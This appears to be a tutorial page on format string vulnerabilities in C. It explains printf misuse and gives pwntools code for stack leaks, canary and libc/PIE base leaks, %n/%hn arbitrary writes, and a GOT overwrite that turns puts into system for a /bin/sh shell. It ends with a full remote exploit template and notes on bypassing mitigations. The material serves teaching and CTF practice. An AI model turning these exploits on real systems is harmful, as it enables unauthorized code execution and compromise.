Memory Corruption

⚡ Intermediate

Format String Vulnerabilities

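Format string vulnerabilities occur when user-controlled input is passed as the format string argument to functions such as printf(), instead of being supplied as data to a fixed format string. Because printf() interprets every conversion specifier in that input, an attacker can read from and write to arbitrary memory locations.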

Impact

Format string bugs can lead to: information disclosure (stack/heap leaks), arbitrary memory writes, stack canary bypass, and ultimately remote code execution.

The Vulnerability

❌ Vulnerable Code

char buf[100];
fgets(buf, 100, stdin);
printf(buf);  // User controls format string!

✓ Safe Code

char buf[100];
fgets(buf, 100, stdin);
printf("%s", buf);  // Format string is fixed

Useful Format Specifiers

Specifier	Description	Exploit Use
%x	Print hex (32-bit)	Leak stack values
%lx	Print hex (64-bit)	Leak stack values (x64)
%p	Print pointer	Leak addresses
%s	Print string at address	Read arbitrary memory
%n	Write number of bytes printed so far (as a 4-byte int)	Arbitrary write!
%hn	Write the same count as 2 bytes (short)	Partial overwrite
%N$x	Direct parameter access	Read specific stack position

Reading the Stack

Basic Stack Leak

bash

# Input multiple %x to dump stack values
%x.%x.%x.%x.%x.%x.%x.%x

# Output shows stack contents:
# 0.64.f7fc4580.0.f7fc4580.ffffffff.deadbeef.41414141

# Using %p for cleaner pointer output (with 0x prefix)
%p.%p.%p.%p.%p.%p.%p.%p
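
A dump like the one above is easier to work with once it is split into integers. The following is a minimal sketch, assuming the values are separated by dots and were printed with %x or %p. The names parse_dump and find_marker are hypothetical helpers for illustration, not part of pwntools.

```python
def parse_dump(dump):
    """Split a dot-separated %x/%p dump into a list of integers."""
    values = []
    for field in dump.strip().split('.'):
        # glibc prints a NULL pointer as "(nil)" when %p is used
        values.append(0 if field == '(nil)' else int(field, 16))
    return values


def find_marker(values, marker=0x41414141):
    """Return the 1-based stack position holding the marker, or None."""
    for position, value in enumerate(values, start=1):
        if value == marker:
            return position
    return None


dump = '0.64.f7fc4580.0.f7fc4580.ffffffff.deadbeef.41414141'
values = parse_dump(dump)
print([hex(v) for v in values])
print('marker at position', find_marker(values))
```

The 1-based position returned here is the N to use in %N$x.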

Direct Parameter Access

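Use %N$x to access the Nth argument directly instead of walking the stack one specifier at a time. On 32-bit x86 every argument is a stack slot. On x86-64 the first five positions after the format string come from registers (rsi, rdx, rcx, r8, r9), so stack slots start at position 6: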

bash

# Read 6th value on stack (often where our input lands)
%6$x

# Read 10th value as pointer
%10$p

# Find where your input lands on the stack
AAAA%6$x%7$x%8$x%9$x%10$x
# Look for 41414141 (hex for AAAA)
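
The probe above prints the values back to back, so it can be hard to tell where one value ends and the next begins. The sketch below builds the same kind of probe with a separator between fields and then maps the matching field back to its position. build_probe and locate are hypothetical helper names, and the '|' separator is an arbitrary choice.

```python
def build_probe(first, last, marker=b'AAAA', sep=b'|'):
    """Build a probe such as b'AAAA|%6$x|%7$x' covering positions first..last."""
    specs = [b'%%%d$x' % n for n in range(first, last + 1)]
    return marker + sep + sep.join(specs)


def locate(output, first, marker_hex=b'41414141', sep=b'|'):
    """Return the position whose field equals the marker, or None."""
    fields = output.strip().split(sep)[1:]  # drop the echoed marker itself
    for index, field in enumerate(fields):
        if field == marker_hex:
            return first + index
    return None


probe = build_probe(6, 10)
print(probe)

# Example response, made up for illustration
print(locate(b'AAAA|f7fc4580|41414141|0|64|ffffd5d0\n', first=6))
```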

Finding Your Input Offset

python

from pwn import *

# Automated offset finder.
# Assumes the target echoes one line of output per line of input.
def find_offset(p, max_offset=50):
    for i in range(1, max_offset + 1):
        p.sendline(f'AAAA%{i}$x'.encode())  # pwntools expects bytes in Python 3
        output = p.recvline()
        if b'41414141' in output:
            print(f'[+] Input found at offset {i}')
            return i
    return None

Information Leaks

Leaking Stack Canary

python

# The stack canary usually sits at a fixed offset from the buffer.
# Find it by leaking stack values and looking for a random-looking
# value whose lowest byte is 00.

# Example: canary at offset 15, so the format string is %15$p

# In a pwntools exploit:
p.sendline(b'%15$p')
canary = int(p.recvline().strip(), 16)
print(f'[+] Leaked canary: {hex(canary)}')
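
When scanning several offsets it helps to filter candidates automatically. The sketch below relies on one property of glibc canaries on Linux: the lowest byte is zero and the remaining bytes are random. It is only a heuristic, and parse_pointer and looks_like_canary are hypothetical helper names.

```python
def parse_pointer(text):
    """Convert the bytes printed by %p into an integer."""
    text = text.strip()
    if text == b'(nil)':  # glibc's rendering of a NULL pointer
        return 0
    return int(text, 16)


def looks_like_canary(value, bits=64):
    """Heuristic check: fits the word size, low byte is 0, rest is non-zero."""
    if value >> bits:
        return False          # wider than a machine word
    if value & 0xff != 0:
        return False          # canary low byte is always 00
    return (value >> 8) != 0  # reject plain zero


# Example values, made up for illustration
for leak in (b'0x5f3a9c117d2e8800\n', b'0x7ffff7a05b97\n', b'(nil)\n'):
    value = parse_pointer(leak)
    print(hex(value), looks_like_canary(value))
```

Values that pass the check are still only candidates, because any aligned pointer with a zero low byte passes too. Confirm the offset in a debugger.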

Leaking Libc Address

python

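# Return addresses on the stack often point into libc.
# The return address into __libc_start_main (__libc_start_main+X) is commonly found.

p.sendline(b'%41$p')  # Offset varies by binary
libc_leak = int(p.recvline().strip(), 16)

# Calculate libc base.
# The offset below is that of the leaked return site inside libc: the symbol
# offset of __libc_start_main (nm -D libc.so.6 | grep __libc_start_main)
# plus the distance X into the function. It is specific to one libc build.
libc_start_main_offset = 0x21bf7
libc_base = libc_leak - libc_start_main_offset

print(f'[+] Libc base: {hex(libc_base)}')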
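
A quick sanity check catches most wrong offsets: a correctly computed image base is page-aligned. The sketch below wraps the subtraction with that check. base_from_leak is a hypothetical helper name, and the leak value in the usage lines is made up.

```python
PAGE_SIZE = 0x1000


def base_from_leak(leak, offset_in_image):
    """Subtract the known offset and verify the result is page-aligned."""
    base = leak - offset_in_image
    if base < 0 or base % PAGE_SIZE != 0:
        raise ValueError(
            f'base {hex(base)} is not page-aligned; wrong offset or wrong libc?'
        )
    return base


leak = 0x7f1234021bf7  # made-up leaked return address
print(hex(base_from_leak(leak, 0x21bf7)))
```

If the check fails, the usual causes are a leak taken from the wrong stack position or an offset taken from a different libc build than the target's.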

Leaking PIE Base

python

# Find a return address that points into the main binary
p.sendline(b'%43$p')  # Adjust offset
pie_leak = int(p.recvline().strip(), 16)

# Calculate base
main_offset = 0x1234  # Offset of the leaked address within the binary (from binary analysis)
pie_base = pie_leak - main_offset

print(f'[+] PIE base: {hex(pie_base)}')
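
To decide which leaked value belongs to the binary and which to libc or the stack, the address range is a useful first hint. The sketch below encodes a common rule of thumb for x86-64 Linux with ASLR enabled: PIE binaries tend to be mapped at addresses starting with 0x55 or 0x56, while shared libraries and the stack start with 0x7f. This is an assumption about typical layouts, not a guarantee, and classify is a hypothetical helper name.

```python
def classify(pointer):
    """Guess the region of a 48-bit user-space pointer from its top byte."""
    top = pointer >> 40
    if top in (0x55, 0x56):
        return 'pie'
    if top == 0x7f:
        return 'libc-or-stack'
    return 'other'


# Example values, made up for illustration
for value in (0x55d4c3a01234, 0x7ffff7a05b97, 0x41414141, 0):
    print(hex(value), classify(value))
```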

Arbitrary Write with %n

How %n Works

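The %n specifier prints nothing. Instead it stores the number of bytes printed so far into the int that its argument points to. The attacker controls both the argument (an address placed on the stack through the input buffer) and the count (through padding such as %100c), so combining %n with direct parameter access enables writing arbitrary values to arbitrary addresses.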
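
The counting rule can be checked offline before sending anything to a target. The sketch below is a deliberately small model of printf, not a full implementation: it understands only literal bytes, %Nc padding, and the %n, %hn and %hhn conversions (optionally with a K$ position), and it assumes the literal bytes contain no '%'. simulate_writes is a hypothetical helper name.

```python
import re
import struct

# %[K$][width](hhn|hn|n|c)
TOKEN = re.compile(rb'%(?:(\d+)\$)?(\d*)(hhn|hn|n|c)')
SIZES = {b'n': 4, b'hn': 2, b'hhn': 1}


def simulate_writes(fmt):
    """Return (position, size_in_bytes, value) for every %n-style write."""
    count = 0  # bytes "printed" so far
    pos = 0
    writes = []
    for match in TOKEN.finditer(fmt):
        count += match.start() - pos  # literal bytes before this specifier
        pos = match.end()
        position, width, conv = match.groups()
        if conv == b'c':
            count += max(int(width or 1), 1)  # %c prints at least one byte
        else:
            size = SIZES[conv]
            stored = count % (1 << (8 * size))  # truncated to the write size
            writes.append((int(position) if position else None, size, stored))
    return writes


# 4 address bytes + 96 padding bytes = 100, stored through argument 7
payload = struct.pack('<I', 0x0804a010) + b'%96c%7$n'
print(simulate_writes(payload))
```

The truncation step shows why %hn and %hhn are useful: only the low 16 or 8 bits of the running count end up in memory.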

Basic %n Write

python

# Write value 0x64 (100) to address 0x0804a010 (example address)
# The packed address must not contain 0x00 (ends the format string) or
# 0x0a (ends the fgets input), so an address like 0x08048000 would not work here.
# Place target address on stack, then use %n

# 32-bit example:
# 1. Put address at offset 7 on stack
# 2. Print 100 bytes
# 3. %7$n writes 100 to address at offset 7

payload = p32(0x0804a010)  # Target address
payload += b'%96c'          # Print 96 more chars (100 total with addr)
payload += b'%7$n'          # Write to offset 7

# Verify: 4 (addr) + 96 = 100 bytes = 0x64 written

Writing Large Values

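Writing a full 32-bit value with a single %n would require printing up to about 4 billion characters. Use %hn (2 bytes) or %hhn (1 byte) to write the value in chunks instead: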

python

from pwn import *

# GOT entry or return address (example value; packed form has no 0x00 or 0x0a bytes)
target_addr = 0x0804c010
target_value = 0xdeadbeef

# Write 2 bytes at a time using %hn
# First write 0xbeef to target_addr
# Then write 0xdead to target_addr+2

low_bytes = target_value & 0xffff         # 0xbeef
high_bytes = (target_value >> 16) & 0xffff  # 0xdead

# Build payload (assuming input at offset 6)
payload = p32(target_addr)      # offset 6
payload += p32(target_addr + 2) # offset 7

# Calculate padding
# %hn keeps only the low 16 bits of the running count, so each padding is
# taken modulo 0x10000. This also covers the case high_bytes < low_bytes.
first_write = (low_bytes - 8) % 0x10000  # 8 address bytes are already printed
second_write = (high_bytes - low_bytes) % 0x10000

payload += f'%{first_write}c%6$hn'.encode()
payload += f'%{second_write}c%7$hn'.encode()

print(payload)
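
The same construction can be generalized so that it works for any 32-bit value, including ones where the high half is smaller than the low half. The sketch below uses only the standard library and performs the two %hn writes in ascending order of value, which keeps every padding small and positive. It assumes a 32-bit target, addresses at the start of the buffer, and packed addresses free of 0x00 and 0x0a bytes. build_hn_payload is a hypothetical helper name.

```python
import struct


def build_hn_payload(addr, value, offset):
    """Build a two-write %hn payload storing a 32-bit value at addr.

    offset is the stack position where the start of the input lands.
    """
    halves = [(addr, value & 0xffff), (addr + 2, (value >> 16) & 0xffff)]
    payload = b''.join(struct.pack('<I', a) for a, _ in halves)
    printed = len(payload)  # the 8 address bytes count as printed output

    # Write the smaller half first so the running count only has to grow
    for index in sorted(range(2), key=lambda i: halves[i][1]):
        target = halves[index][1]
        pad = (target - printed) % 0x10000
        if pad:
            payload += b'%%%dc' % pad
            printed += pad
        payload += b'%%%d$hn' % (offset + index)
    return payload


print(build_hn_payload(0x0804c010, 0xdeadbeef, offset=6))
print(build_hn_payload(0x0804c010, 0x1234abcd, offset=6))
```

In the second call the high half (0x1234) is written before the low half (0xabcd), so the specifier order is %7$hn followed by %6$hn.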

Using pwntools fmtstr_payload

python

from pwn import *

# Automatic format string payload generation
context.arch = 'i386'  # or 'amd64'

# Find offset where input appears on stack
offset = 6

# Create payload to write value to address
payload = fmtstr_payload(offset, {
    0x0804c000: 0xdeadbeef,  # GOT overwrite
    0x0804c004: 0xcafebabe   # Multiple writes
})

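# For 64-bit (context.arch = 'amd64'), addresses contain null bytes.
# Recent pwntools versions place the addresses after the format specifiers,
# so the null bytes do not cut the format string short.
# write_size selects the chunk size per write: 'byte', 'short' or 'int'.
target, value = 0x404018, 0xdeadbeef  # placeholder address and value
payload = fmtstr_payload(offset, {target: value}, write_size='short')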

GOT Overwrite Attack

Overwrite a GOT entry to redirect function calls:

python

from pwn import *

elf = ELF('./vuln')
libc = ELF('./libc.so.6')
context.binary = elf  # so fmtstr_payload uses the binary's architecture
p = process('./vuln')

# Leak libc address first
p.sendline(b'%41$p')
libc_leak = int(p.recvline().strip(), 16)
# 243 is the distance of the return site into __libc_start_main for one
# particular libc build; recompute it for the libc in use
libc_base = libc_leak - libc.symbols['__libc_start_main'] - 243

# Calculate system address
system_addr = libc_base + libc.symbols['system']

# Overwrite puts@got with system
puts_got = elf.got['puts']
offset = 6

payload = fmtstr_payload(offset, {puts_got: system_addr})
p.sendline(payload)

# Next call to puts() will call system() instead
p.sendline(b'/bin/sh')
p.interactive()

Complete Exploit Template

fmt_exploit.py

python

#!/usr/bin/env python3
from pwn import *

context.arch = 'amd64'
context.log_level = 'info'

elf = ELF('./vuln')
libc = ELF('./libc.so.6')

# p = process('./vuln')
p = remote('pwn.ctf.com', 1337)

# Step 1: Find format string offset
# Send AAAAAAAA%p.%p.%p... and find where 0x4141414141414141 appears
FMT_OFFSET = 6

# Step 2: Leak addresses
# Leak libc (adjust offsets based on binary)
p.sendlineafter(b'> ', b'%41$p')
libc_leak = int(p.recvline().strip(), 16)
# 243 is libc-specific: distance of the return site into __libc_start_main
libc.address = libc_leak - libc.symbols['__libc_start_main'] - 243
log.info(f'Libc base: {hex(libc.address)}')

# Leak stack canary if needed
p.sendlineafter(b'> ', b'%15$p')
canary = int(p.recvline().strip(), 16)
log.info(f'Canary: {hex(canary)}')

# Step 3: Write exploit
# Overwrite return address or GOT entry
target = elf.got['puts']
value = libc.symbols['system']  # already absolute because libc.address is set

payload = fmtstr_payload(FMT_OFFSET, {target: value})
p.sendlineafter(b'> ', payload)

# Step 4: Trigger (call puts with "/bin/sh")
p.sendlineafter(b'> ', b'/bin/sh')
p.interactive()

Mitigations & Bypasses

FORTIFY_SOURCE

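Replaces printf with __printf_chk. At _FORTIFY_SOURCE=2, glibc aborts when %n appears in a format string that lives in writable memory, and it rejects positional arguments (%N$) that skip earlier positions. Sequential reads with %p and %s still work, so information leaks remain possible even when writes are blocked.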

RELRO (Full)

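GOT is read-only after startup. Target return addresses on the stack instead, or hook pointers such as __malloc_hook on glibc versions older than 2.34, where the hooks still exist. Note that .fini_array lies inside the RELRO segment, so it is only a viable target when RELRO is disabled.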
